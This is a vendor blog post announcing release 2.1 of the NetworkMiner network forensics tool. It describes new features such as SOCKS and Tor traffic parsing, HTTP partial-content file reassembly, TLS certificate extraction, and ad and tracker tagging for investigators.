The new release additionally comes with support for the SOCKS protocol, which is an old school encapsulation protocol used by administrators as well as hackers in order to bypass firewalls or provide anonymous Internet access. The SOCKS parser in NetworkMiner can even be used to read network traffic from Tor in cleartext before it enters the Tor network. However, in order to capture Tor’s SOCKS traffic you’ll have to sniff traffic from the Tor client’s localhost interface on TCP port 9150.

PacketCache Logo

PacketCache

NetworkMiner 2.1 can read packets directly from a local PacketCache service by clicking ”File > Read from PacketCache”. This eliminates the need to run a PowerShell script in order to dump a PCAP file with packets recently captured by PacketCache.

HTTP Partial Content / Range Requests

Byte serving is a feature in HTTP that makes it possible to retrieve only a segment of a file, rather than the complete file, by using the “Range” HTTP header. This feature is often used by BITS in order to download updates for Windows. But we have also seen malware use byte serving, for example malware droppers that attempt to download malicious payloads in a stealthy manner. See Ursnif and Dridex for examples of malware that utilize this technique.

NetworkMiner has previously only reassembled the individual segments of a partial content download. But as of version 2.1 NetworkMiner has the ability to piece together the respective parts into a complete file.

SSL/TLS and X.509 Certificates

NetworkMiner has been able to extract X.509 certificates to disk for many years now, simply by opening a PCAP file with SSL traffic. However, in the 2.1 release we’ve added support for parsing out the SSL details also from FTP’s “AUTH TLS” (a.k.a explicit TLS or explicit SSL) and STARTTLS in SMTP.

NetworkMiner now also extracts details from the SSL handshake and X.509 certificate to the Parameters tab, such as the requested SNI hostname and the Subject CN from the certificate.

SSL and certificate information extracted by NetworkMiner from PCAP
SSL handshake details and certificate info passively extracted from captured HTTPS session to mega.co.nz

NetworkMiner Professional

The new features mentioned so far are all part of the free open source version of NetworkMiner. But we have also added a few additional features to the Professional edition of NetworkMiner as part of the 2.1 release.

The “Browsers” tab of NetworkMiner Professional has been extended with a feature for tracking online ads and web trackers. We are using EasyList and EasyPrivacy from easylist.to in order to provide an up-to-date tracking of ads and trackers. HTTP requests related to ads are colored red, while web tracker requests are blue. These colors also apply to the Files tab and can be modified in the Settings menu (Tools > Settings).

NetworkMiner Professional 2.1 showing Advertisments (red) and Trackers (blue)
NetworkMiner Professional 2.1 showing advertisments (red) and Internet trackers (blue).

The reason why NetworkMiner Pro now tracks ads and trackers is because these types of requests can make up almost half of the HTTP requests that a normal user makes while surfing the web today. Doing forensics on network traffic from a suspect criminal can be a very time consuming task, we therefore hope that being able to differentiate between what traffic that is initiated by the user rather than being triggered by an online advertisement service or internet tracker can save time for investigators.

The RIPE database previously contained a bug that prevented NetworkMiner Professional from properly leveraging netname info from RIPE. This bug has now been fixed, so that the Host Details can be enriched with details from RIPE for IP addresses in Europe. To enable the RIPE database you’ll first have to download the raw data by clicking Tools > Download RIPE DB.

Host Details with RIPE netname
Host Details enriched with RIPE description and netname

We have also extended the exported details about the hosts in the CSV and XML files from NetworkMiner Professional and the command line tool NetworkMinerCLI. The exported information now contains details such as IP Time-to-Live and open ports.

Upgrading to version 2.1

Users who have purchased a license for NetworkMiner Professional 2.0 can download a free update to version 2.1 from our customer portal.

Those who instead prefer to use the free and open source version can grab the latest version of NetworkMiner from the official NetworkMiner page.

Credits

There are several persons I would like to thank for contributing with feature requests and bug reports that have been used to improve NetworkMiner. I would like to thank Dietrich Hasselhorn, Christian Reusch, Jasper Bongertz, Eddi Blenkers and Daniel Spiekermann for their feedback that have helped improve the SMB, SMB2 and HTTP parsers as well as implementing various encapsulation protocols. I would also like to thank several investigators at the Swedish, German and Dutch police as well as EUROPOL for the valuable feedback provided by them.

Posted by Erik Hjelmvik on Wednesday, 11 January 2017 14:30:00 (UTC/GMT)

Tags: #NetworkMiner#POP3#SMTP#IMAP#VXLAN#X.509#PCAP

Short URL: https://netresec.com/?b=17124c4

X / twitter

NETRESEC on X / Twitter: @netresec

Mastodon

NETRESEC on Mastodon: @netresec@infosec.exchange